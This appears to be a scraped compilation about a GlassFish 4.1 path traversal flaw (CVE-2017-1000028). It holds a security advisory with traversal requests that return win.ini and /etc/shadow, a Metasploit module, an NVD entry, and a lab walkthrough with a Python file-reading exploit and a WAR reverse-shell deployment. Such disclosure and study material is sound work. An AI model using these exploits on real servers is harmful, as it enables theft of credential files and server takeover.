Glassfish server open source edition 4.1 exploit

Trustwave SpiderLabs Security Advisory TWSL2015-016: Path Traversal in Oracle GlassFish Server Open Source Edition Published: 08/27/2015 Version: 1.0 Vendor: Oracle Corporation (Project sponsored by Oracle) Product: GlassFish Server Open Source Edition Version affected: 4.1 and prior versions Product description: Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering. The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated. Finding 1: Directory traversal Credit: Piotr Karolak of Trustwave's SpiderLabs #Proof of Concept on Microsoft Windows installation The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass, %C0%2F instead of (/),URL encoding. Example: REQUEST ======== GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini Cookie: JSESSIONID=5c47a3575077b014449e17877a0c Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://a.b.c.d:4848/ Host: a.b.c.d:4848 RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8) Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT Transfer-Encoding: chunked ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files. #Proof of Concept on Linux installation Example: REQUEST ======= GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/ GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1 Host: a.b.c.d:4848 Accept: */* Accept-Language: en Connection: close RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7) Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT Date: Tue, 10 Jan 2015 10:00:00 GMT Connection: close Content-Length: 1087 root:!:16436:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: TRUNCATED lightdm:*:16273:0:99999:7::: colord:*:16273:0:99999:7::: hplip:*:16273:0:99999:7::: pulse:*:16273:0:99999:7::: test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: smmta:*:16436:0:99999:7::: smmsp:*:16436:0:99999:7::: mysql:!:16436:0:99999:7::: Vendor Response: "We plan to fix this issue in the next major GlassFish Server Open Source Edition release." Remediation Steps: No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x which is the current commercial release of GlassFish is not affected. Revision History: 01/12/2015 - Vulnerability disclosed to vendor 02/18/2015 - Notified vendor about the updates to TW security policy 05/19/2015 - Ninety-day deadline exceeded 07/14/2015 - Requested status from vendor 07/31/2015 - Requested status from vendor 08/21/2015 - Notified vendor about public disclosure 08/27/2015 - Advisory published References 1. https://www.owasp.org/index.php/Path_Traversal 2. https://glassfish.java.net/ 3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

CVEdetails.com the ultimate security vulnerability data source

(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)

Use of this information constitutes acceptance for use in an AS IS condition.There are NO warranties, implied or otherwise, with regard to this information or its use.Any use of this information is at the user’s risk.It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,INDIRECT or any other kind of loss.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP. }, 'References' => [ ['CVE', '2017-1000028'], ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], ['EDB', '39441'] ], 'Author' => [ 'Trustwave SpiderLabs', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'DisclosureDate' => 'Aug 08 2015', 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(4848), OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']), OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "%c0%af.." * datastore['DEPTH'] << filename res = send_request_raw({ 'method' => 'GET', 'uri' => "/theme/META-INF/prototype#{traversal}" }) unless res && res.code == 200 print_error('Nothing was downloaded') return end vprint_good("#{peer} - #{res.body}") path = store_loot( 'oracle.traversal', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end 

CVEdetails.com the ultimate security vulnerability data source

(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)

Use of this information constitutes acceptance for use in an AS IS condition.There are NO warranties, implied or otherwise, with regard to this information or its use.Any use of this information is at the user’s risk.It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,INDIRECT or any other kind of loss.

CVE-2017-1000028

Detail

Current Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

View Analysis Description

Analysis Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

Severity

CVSS 3.x Severity and Metrics:
NIST CVSS score

NIST: 

NVD

Base Score: 7.5 HIGH

Vector: 

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 Severity and Metrics:

National Institute of Standards and Technology

NIST: 

NVD

Base Score: 5.0 MEDIUM

Vector: 

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-ID CWE Name Source CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) cwe source acceptance level

NIST  

Known Affected Software Configurations Switch to CPE 2.2

CPEs loading, please wait.

Denotes Vulnerable Software
Are we missing a CPE here? Please let us know.

Change History

4 change records found show changes

Modified Analysis by NIST

5/03/2019 2:27:52 PM

Action Type Old Value New Value Changed Reference Type

https://www.exploit-db.com/exploits/45196/ No Types Assigned
https://www.exploit-db.com/exploits/45196/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.exploit-db.com/exploits/45198/ No Types Assigned
https://www.exploit-db.com/exploits/45198/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE

8/17/2018 6:29:01 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE

8/16/2018 6:29:00 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST

7/21/2017 11:50:13 AM

Action Type Old Value New Value Added CPE Configuration

OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*

Added CVSS V2

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Added CVSS V3

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Added CWE

CWE-22

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 No Types Assigned
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry:
CVE-2017-1000028
NVD Published Date:

07/17/2017

NVD Last Modified:

05/03/2019

Source:

MITRE

Better late than never, I guess.  I wanted to write this up a while back but I got distracted and by the time I returned to my notes, I felt like I’d lost the flow.  I had the screenshots but when I looked at it, I could remember that I wanted to discuss a few points but I couldn’t remember exactly what.  Rather than just upload the images with some text, I decided to go back through it once more.  But then I had an issue with the server where it was living and I ended up rebuilding the image.  So it’s been awhile.  Moving on…

According to Wiki:  “GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server.”

When I began poking around, the avenues of attack for GlassFish felt similar to Tomcat.  When I searched for the difference, I came up with:  “Tomcat is simply an HTTP server and a Java servlet container. Glassfish is a complete Java EE application server.”  So not exactly the same but perhaps they were built with a similar style.

In our enumeration process, we uncover the GlassFish login page:

When we check searchsploit, we find:

When I view the contents of the file for the GlassFish 4.1 Directory Traversal, I see a basic Local File Inclusion vulnerability which I decide to go after with Python:

#!/usr/bin/python

import urllib2
import os
import ssl

if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
print "[*] Target URL format = https://www.mydomain.com:4848"
host = raw_input("[*] Enter target URL: ")

while True:

    print "[*] Target file format = windows/win.ini"
    file = raw_input("[*] Enter target file: ")
    path = '/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af'
    combined = host + path + file
    url = urllib2.urlopen(combined)
    print
    print ("fetching... ") + combined
    html = url.readlines()
    print
    print html
    print

I’ve highlighted the vulnerable URL and you can literally paste this into a browser to get the same result.  

I prefer to write this into a loop that allows me to hit a few different files should I choose to do so.

When we execute our script, I go after the win.ini file and when that works, I go after the GlassFish hash:

I spend entirely too much time trying to crack this hash — unsuccessfully.  A few points on the hash.  First, there wasn’t an obvious hash type.  Several are close.  There were also some reversing angles using base64 -d, xxd, and sed but that also went nowhere.  In each case, I ended up with a string and a possible hash type to crack with Hashcat but none were successful.  Eventually, I moved on because I don’t know enough about this particular hash and the Internet didn’t provide any concrete assistance.  

There’s also another hash stored in:

c:glassfishglassfish4glassfishdomainsdomain1configlocal-password

But once again, I couldn’t get the hash type and I was unable to crack it.

For the purpose of my education, I reset the password to one that I could brute force and then I went after it with Metasploit:

Once setup, I run:

Not long after, I retrieve the credentials and I’m heading for the admin interface:

Once we get into the admin interface, we see something that looks similar to Tomcat:

We browse to the Deploy page:

Assuming we’re dealing with the same format, we generate a .war file with msfvenom:

We get our handler setup:

We then browse to our payload:

When we choose “OK”, we see our uploaded payload:

We select Launch and we are brought to a secondary page which is a slight deviation from Tomcat but we’ll roll with it:

Noting that it’s using the server name instead of IP address, I quickly add an entry into the hosts file in order to keep this from failing.  Once I get the entry set, I click on the first link:

Moving back over to Metasploit:

We see the inbound connection from the GlassFish server.  

We could also perform this task with Metasploit:

A couple of things to point out.  First, it’s very particular about the payload and the target.  Second, even though we get the correct payload and target, it takes a couple of tries to get a shell.  That’s not necessarily unique for Metasploit but when we’re dealing with an unknown application, it’s possible to think it doesn’t work but it’s also maybe the time to hit run a few more times for good measure.

After two failed attempts, I run a third time:

And we catch our shell.

Metasploit also had a module for the Directory Traversal but I like the Python script with loop function where I can just enter a file name without having to do the extra steps. 

Aside from that, GlassFish is fairly standard.  I haven’t encountered it previously and for the sake of trying to remember as much as possible, I like to go through it, write about it, and have a record for later review.  The password hash, for example, is something I might forget and I could end up burning more time to draw the same conclusion.

Written by Jane